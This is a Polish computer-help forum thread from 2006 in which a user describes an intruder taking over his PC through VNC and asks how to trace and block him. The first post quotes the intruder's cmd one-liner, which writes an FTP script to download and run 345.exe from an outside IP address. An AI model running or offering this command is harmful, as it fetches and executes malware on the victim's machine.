Włamanie przez VNC Viewer

Dla specjalistów Bezpieczeństwo
#1

Zainstalowałem program VNC Viewer zamiast pulpitu zdalnego aby pomóc koledze w nauce obsługi komputera(ma dopiero kilka dni komputer). Podczas instalacji wpisałem hasło czyli wszystko powinno być ok. W pewnym momencie zauważyłem że ktoś korzysta z cmd.exe. Bardzo szybko wyłączyłem komputer z sieci. Po restarcie sytuacja zaczeła się powtażać, przyszło mi do głowy że otworzę notatnik który posłuży mi za komunikator i zwyzywam gościa. Biorąc pod uwagę jak wolno się pracuje na vnc koleś chyba nie zauważył że to notatnik i wpisał mi pewną ścieżkę: &echo open 85.28.239.37 4215 > i&echo user 1 1 >> i &echo get 345.exe >> i &echo quit >> i &ftp -n -s:i &345.exe&del i&exit.

Proszę o pomoc gdzie ewentualnie mam szukać śladów po gościu i co znaczy ten wpis. Na wszelki wypadek podaję log:

Załnczam log z Silent Runners

#2

Logi są czyste i nie ma w nich śladu po żadnym włamaniu :slight_smile:

Przeczyść rejestr (polecam do tego jv16 PowerTools), zrób defragmentację, oraz przejrzyj: Optymalizacja XP

Wejdź: Start -> uruchom -> msconfig i w zakładce uruchamianie odznacz (według Ciebie) niepotrzebne przy autostarcie programy :slight_smile:

#3

Dzięki za sprawdzenie. Ale nadal mam ten sam problem, po załączeniu VNC po kilku minutach widzę jak gość włącza ‘‘uruchom’’ i wpisuje cmd. Jak mogę zabezpieczyć VNC VIEWER przed nieautoryzowanym wejściem. Zmiana hasła nie pomaga. Jakoś nie mogę znaleźć w opcjach jak można zablokować dane IP. Też nie wiem w jaki sposób koleś obchodzi hasło. Wszystko by było ok, ale VNC to użyteczny programik i czasami bym go używał ale teraz się obawiam.

#4

Próbowałes przeinstalować VNC?

#5

Tak przeistalowałem przed chwilą i cały czas siędzę przy kompie. Wczoraj aktywny gość był między 11-tą a 16- tą. W międzyczasie pytałem pana google ale nie znalazł podobnego przypadku. A tak w nawiasie sprawdziłem gościa ip kilkakrotnie wczoraj i dziś i wygląda że koleś jest z Kamczatki. Może szuka swojej kufajki ??

Po edycji:

Na razie mogę sobie odpuścić czekanie puściłem pinga na jego ip i gość ma kompa wyłączonego. Wczoraj miałem ping na to IP w granicach 600 ms. Co jakiś czas będę sprawdzał najpierw pingiem.

Po edycji 2:

Będę miał logi z 2 kompa gdzie nikt nie zauważył że koś miesza w komputerze. Mam kolejne polecenia które gość wpisywał łącznie ze ścieżką: http:… Jest to zbiór pewnych plików exe…Prawdopodobnie z tego http został załadowany jakiś śmieć. Ale co konkretnie to dopiero jutro wieczorem zobaczę. Proszę o podpowiedź komu mogę zgłosić taką stronkę i czy jest szansa żeby gościa przyłapać.

Złączono Posta : 05.12.2006 (Wto) 21:31

Podaję log z drugiego komputera, proszę o sprawdzenie:

Z góry dziękuję.